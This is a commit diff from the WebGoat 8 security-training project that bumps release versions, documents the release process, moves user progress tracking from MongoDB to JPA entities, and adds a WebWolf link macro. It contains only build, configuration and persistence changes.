All lesson flags are displayed while running webgoat 8.0 standalone java file #430

Deleted the Vagrant files for setting up dev environment, today it is
easy to setup the dev environment yourself to start working.

.gitignore

@@ -14,7 +14,8 @@
 /.settings/org.eclipse.wst.validation.prefs
 /.externalToolBuilders/
 .project
-/target
+*/target/*
+mongo-data/*
 .classpath
 .idea/
 .settings/
@@ -29,6 +30,7 @@ src/main/webapp/plugin_lessons/*.jar
 src/main/webapp/users/*.props
 classes/*
 *.iml
+pom.xml.versionsBackup
 
 /*.iml
 .extract/*
@@ -39,3 +41,4 @@ webgoat-lessons/**/target
 **/*.jar
 **/.DS_Store
 webgoat-server/mongo-data/*
+webgoat-lessons/vulnerable-components/dependency-reduced-pom.xml

.travis.yml

@@ -7,6 +7,7 @@ install: "/bin/true"
 script:
 - export BRANCH=$(if [ "$TRAVIS_PULL_REQUEST" == "false" ]; then echo $TRAVIS_BRANCH; else echo $TRAVIS_PULL_REQUEST_BRANCH; fi)
 - echo "TRAVIS_BRANCH=$TRAVIS_BRANCH, PR=$PR, BRANCH=$BRANCH"
+- if [ ! -z "${TRAVIS_TAG}" ]; then mvn versions:set -DnewVersion=${TRAVIS_TAG:1}; fi
 - mvn clean install -q
 cache:
   directories:
@@ -35,6 +36,7 @@ deploy:
       branch: develop
   - provider: releases
     skip_cleanup: true
+    overwrite: true
     api_key:
       #api-key from webgoat-github user
       secure: pJOLBnl6427PcVg/tVy/qB18JC7b8cKpffau+IP0pjdSt7KUfBdBY3QuJ7mrM65zRoVILzggLckaew2PlRmYQRdumyWlyRn44XiJ9KO4n6Bsufbz+ictB4ggtozpp9+I9IIUh1TmqypL9lhkX2ONM9dSHmyblYpAAgMuYSK8FYc=

CREATE_RELEASE.MD

@@ -0,0 +1,29 @@
+## Release WebGoat
+
+
+### Version numbers
+
+For WebGoat we use milestone releases first before we release the official version, we use `v8.0.0.M3` while tagging
+ and 8.0.0.M3 in the `pom.xml`. When we create the final release we remove the milestone release and use 
+ `v8.0.0` and 8.0.0 in the `pom.xml`
+
+At the moment we use Gitflow, for a release you create a new release branch and take the following steps:
+
+```
+git checkout develop
+git flow release start <version>
+mvn versions:set <<version> 
+git commit -am "New release, updaing pom.xml" 
+git flow release publish
+```
+
+Now we can make a new release, be sure you committed all your changes.
+
+```
+git tag v8.0.0.M3
+git push origin v8.0.0.M3 
+```
+
+Now Travis takes over and will create the release in Github and on Docker Hub. 
+
+

README.MD

@@ -1,15 +1,11 @@
-# WebGoat: A deliberately insecure Web Application
+# WebGoat 8: A deliberately insecure Web Application
 
 [![Build Status](https://travis-ci.org/WebGoat/WebGoat.svg?branch=develop)](https://travis-ci.org/WebGoat/WebGoat)
 [![Coverage Status](https://coveralls.io/repos/WebGoat/WebGoat/badge.svg?branch=develop&service=github)](https://coveralls.io/github/WebGoat/WebGoat?branch=master)
 [![Codacy Badge](https://api.codacy.com/project/badge/b69ee3a86e3b4afcaf993f210fccfb1d)](https://www.codacy.com/app/dm/WebGoat)
 [![Dependency Status](https://www.versioneye.com/user/projects/562da95ae346d7000e0369aa/badge.svg?style=flat)](https://www.versioneye.com/user/projects/562da95ae346d7000e0369aa)
-[![OWASP Labs](https://img.shields.io/badge/owasp-labs-orange.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
-
-# Important
-
-This is the development version of WebGoat 8, if you are looking for a released stable version please go to: https://github.com/WebGoat/WebGoat/wiki/Running-WebGoat
-
+[![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects) 
+[![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest) 
 
 # Introduction
 
@@ -65,9 +61,23 @@ _Please note: this version may not be completely in sync with the develop branch
 Download the latest WebWolf release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```Shell
-java -jar webwolf-<<version>>.jar
+java -jar webgoat-server-<<version>>.jar
 ```
 
+By default WebGoat starts at port 8080 in order to change this use the following property:
+
+```Shell
+java -jar webgoat-server-<<version>>.jar --server.port=9090
+```
+
+You can specify one of the following arguments when starting WebGoat:
+
+```Shell
+java -jar webgoat-server-<<version>>.jar --server.port=9090 --server.address=x.x.x.x
+```
+
+This will start WebGoat on a different port and/or different address.
+
 
 ## 3. Run from the sources
 
@@ -88,20 +98,22 @@ Now let's start by compiling the project.
 
 ```Shell
 cd WebGoat
-git checkout develop
+git checkout <<branch_name>>
 mvn clean install
 ```
 
 Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
 
 ```Shell
-mvn -pl webwolf spring-boot:run
+mvn -pl webgoat-server spring-boot:run
 ```
 ... you should be running webgoat on localhost:8080/WebGoat momentarily
 
-To change IP addresss add the following variable to WebGoat/webgoat-container/src/main/resources/application.properties file
 
-```server.address=x.x.x.x
+To change IP address add the following variable to WebGoat/webgoat-container/src/main/resources/application.properties file
+
+```
+server.address=x.x.x.x
 ```
 
 # Vagrant
@@ -109,7 +121,7 @@ To change IP addresss add the following variable to WebGoat/webgoat-container/sr
 We supply a complete development environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed.
 
 ```shell
-   $ cd WebGoat/webgoat-images/vagrant-users
+   $ cd WebGoat/webgoat-images/vagrant-training
    $ vagrant up
 ```
 
@@ -119,6 +131,8 @@ The source code will be available in the home directory.
 
 # Building a new Docker image
 
+NOTE: Travis will create a new Docker image automatically when making a new release.
+
 WebGoat now has Docker support for x86 and ARM (raspberry pi).
 ### Docker on x86
 On x86 you can build a container with the following commands:

docker-compose.yml

@@ -1,31 +1,11 @@
 version: '2.0'
 
 services:
-  activemq:
-    image: webcenter/activemq:latest
-    ports:
-      - 8161:8161
-      - 61616:61616
-      - 61613:61613
-  mongo:
-    image: mongo:latest
-    expose:
-      - "27017"
-    volumes:
-      - './mongo-data:/data/db'
   webgoat:
     build: webgoat-server/
     command: "sh /home/webgoat/start.sh"
     ports:
       - "8080:8080"
-    depends_on:
-      [mongo, activemq]
-    environment:
-      WG_MONGO_PORT: 27017
-      WG_MONGO_HOST: mongo
-      WG_MQ_HOST: activemq
-      WG_MQ_PORT: 61616
-      WG_INTERNAL_MONGO: "false"
   webwolf:
     build: webwolf/
     command: "sh /home/webwolf/start.sh"
@@ -33,8 +13,3 @@ services:
       - webgoat
     ports:
       - "8081:8081"
-    environment:
-      WG_MONGO_PORT: 27017
-      WG_MONGO_HOST: mongo
-      WG_MQ_HOST: activemq
-      WG_MQ_PORT: 61616

pom.xml

@@ -5,7 +5,7 @@
     <groupId>org.owasp.webgoat</groupId>
     <artifactId>webgoat-parent</artifactId>
     <packaging>pom</packaging>
-    <version>8.0.0.M2</version>
+    <version>8.0.0.M3</version>
 
     <name>WebGoat Parent Pom</name>
     <description>Parent Pom for the WebGoat Project. A deliberately insecure Web Application</description>
@@ -20,7 +20,7 @@
     <parent>
         <groupId>org.springframework.boot</groupId>
         <artifactId>spring-boot-starter-parent</artifactId>
-        <version>1.5.5.RELEASE</version>
+        <version>1.5.9.RELEASE</version>
     </parent>
 
     <licenses>
@@ -142,7 +142,6 @@
         <javaee-api.version>6.0</javaee-api.version>
         <javax.transaction-api.version>1.2</javax.transaction-api.version>
         <jcl-over-slf4j.version>1.7.12</jcl-over-slf4j.version>
-        <jstl.version>1.2</jstl.version>
         <jtds.version>1.3.1</jtds.version>
         <junit.version>4.12</junit.version>
         <mail-api.version>1.5.4</mail-api.version>
@@ -296,8 +295,8 @@
         <dependency>
             <groupId>org.projectlombok</groupId>
             <artifactId>lombok</artifactId>
-            <version>1.16.10</version>
             <scope>provided</scope>
+            <optional>true</optional>
         </dependency>
         <dependency>
             <groupId>org.apache.commons</groupId>

scripts/deploy-webgoat.sh

@@ -4,6 +4,7 @@ docker login -u $DOCKER_USER -p $DOCKER_PASS
 export REPO=webgoat/webgoat-8.0
 
 cd webgoat-server
+ls target/
 
 if [ "${BRANCH}" == "master" ] && [ ! -z "${TRAVIS_TAG}" ]; then
   # If we push a tag to master this will update the LATEST Docker image and tag with the version number
@@ -11,11 +12,11 @@ if [ "${BRANCH}" == "master" ] && [ ! -z "${TRAVIS_TAG}" ]; then
   docker push $REPO
 elif [ ! -z "${TRAVIS_TAG}" ]; then
   # Creating a tag build we push it to Docker with that tag
-  docker build --build-arg webgoat_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} .
-  docker push $REPO
-elif [ "${BRANCH}" == "develop" ]; then
-  docker build -f Dockerfile -t $REPO:snapshot .
+  docker build --build-arg webgoat_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} -t $REPO:latest .
   docker push $REPO
+#elif [ "${BRANCH}" == "develop" ]; then
+#  docker build -f Dockerfile -t $REPO:snapshot .
+#  docker push $REPO
 else
   echo "Skipping releasing to DockerHub because it is a build of branch ${BRANCH}"
 fi

webgoat-container/pom.xml

@@ -10,7 +10,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 
     <profiles>
@@ -36,16 +36,6 @@
 
     </profiles>
 
-    <dependencyManagement>
-        <dependencies>
-            <dependency>
-                <groupId>de.flapdoodle.embed</groupId>
-                <artifactId>de.flapdoodle.embed.mongo</artifactId>
-                <version>2.0.0</version>
-            </dependency>
-        </dependencies>
-    </dependencyManagement>
-
     <build>
         <resources>
             <resource>
@@ -92,29 +82,6 @@
                     <forkMode>never</forkMode>
                 </configuration>
             </plugin>
-            <plugin>
-                <artifactId>maven-clean-plugin</artifactId>
-                <configuration>
-                    <filesets>
-                        <fileset>
-                            <directory>${project.basedir}/src/main/resources/plugin_lessons</directory>
-                            <includes>
-                                <include>**/*.jar</include>
-                                <include>**/*.pom</include>
-                            </includes>
-                        </fileset>
-                        <fileset>
-                            <directory>${user.home}/.webgoat/</directory>
-                            <includes>
-                                <include>**/*.jar</include>
-                                <include>**/org/**</include>
-                                <include>**/plugin/**</include>
-                            </includes>
-                        </fileset>
-
-                    </filesets>
-                </configuration>
-            </plugin>
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-jar-plugin</artifactId>
@@ -135,14 +102,6 @@
             <groupId>com.fasterxml.jackson.datatype</groupId>
             <artifactId>jackson-datatype-jsr310</artifactId>
         </dependency>
-        <dependency>
-            <groupId>org.projectlombok</groupId>
-            <artifactId>lombok</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.projectlombok</groupId>
-            <artifactId>lombok</artifactId>
-        </dependency>
         <dependency>
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-web</artifactId>
@@ -150,10 +109,6 @@
         <dependency>
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-actuator</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-cache</artifactId>
         </dependency>
         <dependency>
             <groupId>org.asciidoctor</groupId>
@@ -162,31 +117,26 @@
         </dependency>
         <dependency>
             <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-data-mongodb</artifactId>
+            <artifactId>spring-boot-starter-data-jpa</artifactId>
         </dependency>
         <dependency>
             <groupId>org.apache.commons</groupId>
             <artifactId>commons-lang3</artifactId>
             <version>${commons-lang3.version}</version>
         </dependency>
+        <dependency>
+            <groupId>com.google.guava</groupId>
+            <artifactId>guava</artifactId>
+            <version>${guava.version}</version>
+        </dependency>
+
+
         <dependency>
             <groupId>io.gatling.highcharts</groupId>
             <artifactId>gatling-charts-highcharts</artifactId>
             <version>${gatling.version}</version>
             <scope>test</scope>
         </dependency>
-        <dependency>
-            <groupId>javax.servlet</groupId>
-            <artifactId>jstl</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-data-jpa</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-jdbc</artifactId>
-        </dependency>
         <dependency>
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-security</artifactId>
@@ -205,11 +155,6 @@
             <artifactId>activation</artifactId>
             <version>${activation.version}</version>
         </dependency>
-        <dependency>
-            <groupId>com.h2database</groupId>
-            <artifactId>h2</artifactId>
-            <version>${h2.version}</version>
-        </dependency>
         <dependency>
             <groupId>org.hsqldb</groupId>
             <artifactId>hsqldb</artifactId>
@@ -224,19 +169,7 @@
             <groupId>org.scala-lang</groupId>
             <artifactId>scala-compiler</artifactId>
             <version>${scala.version}</version>
-        </dependency>
-
-        <!-- Apache Commons Upload -->
-        <dependency>
-            <groupId>commons-fileupload</groupId>
-            <artifactId>commons-fileupload</artifactId>
-            <version>${commons-fileupload.version}</version>
-        </dependency>
-
-        <dependency>
-            <groupId>com.google.guava</groupId>
-            <artifactId>guava</artifactId>
-            <version>${guava.version}</version>
+            <scope>test</scope>
         </dependency>
 
 
@@ -259,12 +192,6 @@
             <version>${junit.version}</version>
             <type>jar</type>
         </dependency>
-        <dependency>
-            <groupId>com.github.fakemongo</groupId>
-            <artifactId>fongo</artifactId>
-            <version>2.1.0</version>
-            <scope>test</scope>
-        </dependency>
         <!-- ************* END: Dependencies for Unit and Integration Testing ************** -->
         <!-- ************* END: <dependencies> ************** -->
     </dependencies>

webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java

@@ -32,7 +32,10 @@ package org.owasp.webgoat;
 
 import com.google.common.collect.Maps;
 import com.google.common.collect.Sets;
+import lombok.extern.slf4j.Slf4j;
 import org.asciidoctor.Asciidoctor;
+import org.asciidoctor.extension.JavaExtensionRegistry;
+import org.owasp.webgoat.asciidoc.WebWolfMacro;
 import org.owasp.webgoat.i18n.Language;
 import org.thymeleaf.TemplateProcessingParameters;
 import org.thymeleaf.resourceresolver.IResourceResolver;
@@ -41,6 +44,7 @@ import org.thymeleaf.templateresolver.TemplateResolver;
 import java.io.*;
 import java.util.Map;
 
+import static org.apache.commons.lang3.CharEncoding.UTF_8;
 import static org.asciidoctor.Asciidoctor.Factory.create;
 
 /**
@@ -50,6 +54,7 @@ import static org.asciidoctor.Asciidoctor.Factory.create;
  * <div th:replace="doc:AccessControlMatrix_plan.adoc"></div>
  * </code>
  */
+@Slf4j
 public class AsciiDoctorTemplateResolver extends TemplateResolver {
 
     private static final Asciidoctor asciidoctor = create();
@@ -73,11 +78,18 @@ public class AsciiDoctorTemplateResolver extends TemplateResolver {
 
         @Override
         public InputStream getResourceAsStream(TemplateProcessingParameters params, String resourceName) {
-            InputStream is = readInputStreamOrFallbackToEnglish(resourceName, language);
-            try {
+            try (InputStream is = readInputStreamOrFallbackToEnglish(resourceName, language)) {
+                if (is == null) {
+                    log.warn("Resource name: {} not found, did you add the adoc file?", resourceName);
+                    return new ByteArrayInputStream(new byte[0]);
+                } else {
                     StringWriter writer = new StringWriter();
+                    JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
+                    extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
+
                     asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
-                return new ByteArrayInputStream(writer.getBuffer().toString().getBytes());
+                    return new ByteArrayInputStream(writer.getBuffer().toString().getBytes(UTF_8));
+                }
             } catch (IOException e) {
                 //no html yet
                 return new ByteArrayInputStream(new byte[0]);

webgoat-container/src/main/java/org/owasp/webgoat/CleanupLocalProgressFiles.java

@@ -23,11 +23,5 @@ public class CleanupLocalProgressFiles {
 
     @PostConstruct
     public void clean() {
-        File dir = new File(webgoatHome);
-        //do it safe, check whether the subdir mongodb is available as subdirectory
-        File[] mongoDir = dir.listFiles(f -> f.isDirectory() && f.getName().contains("mongodb"));
-        if (mongoDir != null && mongoDir.length == 1) {
-            FileSystemUtils.deleteRecursively(dir);
-        }
     }
 }

webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java

@@ -0,0 +1,25 @@
+package org.owasp.webgoat.asciidoc;
+
+import org.springframework.beans.BeansException;
+import org.springframework.context.ApplicationContext;
+import org.springframework.context.ApplicationContextAware;
+import org.springframework.core.env.Environment;
+import org.springframework.stereotype.Component;
+
+/**
+ * Make environment available in the asciidoc code (which you cannot inject because it is handled by the framework)
+ */
+@Component
+public class EnvironmentExposure implements ApplicationContextAware {
+
+    private static ApplicationContext context;
+
+    public static Environment getEnv() {
+        return context.getEnvironment();
+    }
+
+    @Override
+    public void setApplicationContext(ApplicationContext applicationContext) throws BeansException {
+        context = applicationContext;
+    }
+}

webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java

@@ -0,0 +1,36 @@
+package org.owasp.webgoat.asciidoc;
+
+import org.asciidoctor.ast.AbstractBlock;
+import org.asciidoctor.extension.InlineMacroProcessor;
+import org.springframework.core.env.Environment;
+import org.springframework.util.StringUtils;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+import java.util.Map;
+
+public class WebWolfMacro extends InlineMacroProcessor {
+
+    public WebWolfMacro(String macroName, Map<String, Object> config) {
+        super(macroName, config);
+    }
+
+    @Override
+    protected String process(AbstractBlock parent, String target, Map<String, Object> attributes) {
+        Environment env = EnvironmentExposure.getEnv();
+        String hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
+        return "<a href=\"" + hostname + "\" target=\"_blank\">" + target + "</a>";
+    }
+
+    /**
+     * Look at the remote address from received from the browser first. This way it will also work if you run
+     * the browser in a Docker container and WebGoat on your local machine.
+     */
+    private String determineHost(String host, String port) {
+        HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
+        String ip = request.getRemoteAddr();
+        String hostname = StringUtils.hasText(ip) ? ip : host;
+        return "http://" + hostname + ":" + port + "/WebWolf";
+    }
+}

webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java

@@ -55,7 +55,7 @@ public abstract class AssignmentEndpoint extends Endpoint {
 
 	//// TODO: 11/13/2016 events better fit?
     protected AttackResult trackProgress(AttackResult attackResult) {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
         if (userTracker == null) {
             userTracker = new UserTracker(webSession.getUserName());
         }

webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java

@@ -1,7 +1,9 @@
 package org.owasp.webgoat.lessons;
 
+import com.google.common.collect.Lists;
 import lombok.*;
 
+import javax.persistence.*;
 import java.util.List;
 
 /**
@@ -33,16 +35,30 @@ import java.util.List;
  * @version $Id: $Id
  * @since November 25, 2016
  */
-@AllArgsConstructor
-@RequiredArgsConstructor
-@NoArgsConstructor
 @Getter
 @EqualsAndHashCode
+@Entity
 public class Assignment {
-    @NonNull
+
+    @Id
+    @GeneratedValue(strategy = GenerationType.AUTO)
+    private Long id;
     private String name;
-    @NonNull
     private String path;
+    @Transient
     private List<String> hints;
 
+    private Assignment() {
+        //Hibernate
+    }
+
+    public Assignment(String name, String path) {
+        this(name, path, Lists.newArrayList());
+    }
+
+    public Assignment(String name, String path, List<String> hints) {
+        this.name = name;
+        this.path = path;
+        this.hints = hints;
+    }
 }

webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java

@@ -73,7 +73,7 @@ public class LessonMenuService {
     List<LessonMenuItem> showLeftNav() {
         List<LessonMenuItem> menu = new ArrayList<>();
         List<Category> categories = course.getCategories();
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
 
         for (Category category : categories) {
             LessonMenuItem categoryItem = new LessonMenuItem();

webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java

@@ -40,7 +40,7 @@ public class LessonProgressService {
     @RequestMapping(value = "/service/lessonprogress.mvc", produces = "application/json")
     @ResponseBody
     public Map getLessonInfo() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
         LessonTracker lessonTracker = userTracker.getLessonTracker(webSession.getCurrentLesson());
         Map json = Maps.newHashMap();
         String successMessage = "";
@@ -63,7 +63,7 @@ public class LessonProgressService {
     @RequestMapping(value = "/service/lessonoverview.mvc", produces = "application/json")
     @ResponseBody
     public List<LessonOverview> lessonOverview() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
         AbstractLesson currentLesson = webSession.getCurrentLesson();
         List<LessonOverview> result = Lists.newArrayList();
         if ( currentLesson != null ) {

webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java

@@ -64,7 +64,7 @@ public class ReportCardService {
     @GetMapping(path = "/service/reportcard.mvc", produces = "application/json")
     @ResponseBody
     public ReportCard reportCard() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
         List<AbstractLesson> lessons = course.getLessons();
         ReportCard reportCard = new ReportCard();
         reportCard.setTotalNumberOfLessons(course.getTotalOfLessons());

webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java

@@ -59,7 +59,7 @@ public class RestartLessonService {
         AbstractLesson al = webSession.getCurrentLesson();
         log.debug("Restarting lesson: " + al);
 
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
         userTracker.reset(al);
         userTrackerRepository.save(userTracker);
     }

webgoat-container/src/main/java/org/owasp/webgoat/service/SolutionService.java

@@ -1,66 +0,0 @@
-/**
- * *************************************************************************************************
- * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- */
-package org.owasp.webgoat.service;
-
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-
-/**
- * <p>SolutionService class.</p>
- *
- * @author rlawson
- * @version $Id: $Id
- */
-@Controller
-public class SolutionService {
-
-    /**
-     * Returns solution for current attack
-     *
-     * @return a {@link java.lang.String} object.
-     */
-    @RequestMapping(path = "/service/solution.mvc", produces = "text/html")
-    public
-    @ResponseBody
-    String showSolution() {
-        //// TODO: 11/6/2016 to decide not sure about the role in WebGoat 8
-        String source = getSolution();
-        return source;
-    }
-
-    /**
-     * <p>getSolution.</p>
-     *
-     * @return a {@link java.lang.String} object.
-     */
-    protected String getSolution() {
-        return "Solution  is not available";
-    }
-}

webgoat-container/src/main/java/org/owasp/webgoat/service/SourceService.java

@@ -1,82 +0,0 @@
-/**
- * *************************************************************************************************
- * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- */
-package org.owasp.webgoat.service;
-
-import org.apache.commons.lang3.StringEscapeUtils;
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-
-import javax.servlet.http.HttpSession;
-
-/**
- * <p>SourceService class.</p>
- *
- * @author rlawson
- * @version $Id: $Id
- */
-@Controller
-//TODO REMOVE!
-public class SourceService {
-
-    /**
-     * Description of the Field
-     */
-    public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE";
-
-    /** Constant <code>END_SOURCE_SKIP="END_OMIT_SOURCE"</code> */
-    public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE";
-
-    /**
-     * Returns source for current attack
-     *
-     * @param session a {@link javax.servlet.http.HttpSession} object.
-     * @return a {@link java.lang.String} object.
-     */
-    @RequestMapping(path = "/service/source.mvc", produces = "application/text")
-    public
-    @ResponseBody
-    String showSource(HttpSession session) {
-        //// TODO: 11/6/2016 to decide not sure about the role in WebGoat 8
-        String source = getSource();
-        if (source == null) {
-            source = "No source listing found";
-        }
-        return StringEscapeUtils.escapeHtml4(source);
-    }
-
-    /**
-     * Description of the Method
-     *
-     * @return Description of the Return Value
-     */
-    protected String getSource() {
-        return "Source code is not available for this lesson.";
-    }
-}

webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java

@@ -7,6 +7,7 @@ import lombok.Getter;
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.lessons.Assignment;
 
+import javax.persistence.*;
 import java.util.List;
 import java.util.Map;
 import java.util.Optional;
@@ -44,16 +45,23 @@ import java.util.stream.Collectors;
  * @version $Id: $Id
  * @since October 29, 2003
  */
+@Entity
 public class LessonTracker {
+
+    @Id
+    @GeneratedValue(strategy = GenerationType.AUTO)
+    private Long id;
     @Getter
     private String lessonName;
+    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
     private final Set<Assignment> solvedAssignments = Sets.newHashSet();
-    private final List<Assignment> allAssignments = Lists.newArrayList();
+    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
+    private final Set<Assignment> allAssignments = Sets.newHashSet();
     @Getter
     private int numberOfAttempts = 0;
 
-    protected LessonTracker() {
-        //Mongo
+    private LessonTracker() {
+        //JPA
     }
 
     public LessonTracker(AbstractLesson lesson) {

webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java

@@ -38,7 +38,7 @@ public class Scoreboard {
         List<WebGoatUser> allUsers = userRepository.findAll();
         List<Ranking> rankings = Lists.newArrayList();
         for (WebGoatUser user : allUsers) {
-            UserTracker userTracker = userTrackerRepository.findOne(user.getUsername());
+            UserTracker userTracker = userTrackerRepository.findByUser(user.getUsername());
             rankings.add(new Ranking(user.getUsername(), challengesSolved(userTracker)));
         }
         return rankings;

webgoat-container/src/main/java/org/owasp/webgoat/users/UserForm.java

@@ -15,7 +15,7 @@ import javax.validation.constraints.Size;
 public class UserForm {
 
     @NotNull
-    @Size(min=6, max=10)
+    @Size(min=6, max=20)
     private String username;
     @NotNull
     @Size(min=6, max=10)

webgoat-container/src/main/java/org/owasp/webgoat/users/UserRepository.java

@@ -1,6 +1,6 @@
 package org.owasp.webgoat.users;
 
-import org.springframework.data.mongodb.repository.MongoRepository;
+import org.springframework.data.jpa.repository.JpaRepository;
 
 import java.util.List;
 
@@ -8,7 +8,7 @@ import java.util.List;
  * @author nbaars
  * @since 3/19/17.
  */
-public interface UserRepository extends MongoRepository<WebGoatUser, String> {
+public interface UserRepository extends JpaRepository<WebGoatUser, String> {
 
     WebGoatUser findByUsername(String username);
 

webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java

@@ -2,14 +2,16 @@
 package org.owasp.webgoat.users;
 
 import com.google.common.collect.Lists;
+import com.google.common.collect.Sets;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.lessons.Assignment;
-import org.springframework.data.annotation.Id;
 
+import javax.persistence.*;
 import java.util.List;
 import java.util.Map;
 import java.util.Optional;
+import java.util.Set;
 import java.util.stream.Collectors;
 
 
@@ -44,11 +46,17 @@ import java.util.stream.Collectors;
  * @since October 29, 2003
  */
 @Slf4j
+@Entity
 public class UserTracker {
 
     @Id
-    private final String user;
-    private List<LessonTracker> lessonTrackers = Lists.newArrayList();
+    @GeneratedValue(strategy = GenerationType.AUTO)
+    private Long id;
+    private String user;
+    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
+    private Set<LessonTracker> lessonTrackers = Sets.newHashSet();
+
+    private UserTracker() {}
 
     public UserTracker(final String user) {
         this.user = user;

webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java

@@ -1,12 +1,13 @@
 package org.owasp.webgoat.users;
 
-import org.springframework.data.mongodb.repository.MongoRepository;
+import org.springframework.data.jpa.repository.JpaRepository;
 
 /**
  * @author nbaars
  * @since 4/30/17.
  */
-public interface UserTrackerRepository extends MongoRepository<UserTracker, String> {
+public interface UserTrackerRepository extends JpaRepository<UserTracker, String> {
 
+    UserTracker findByUser(String user);
 
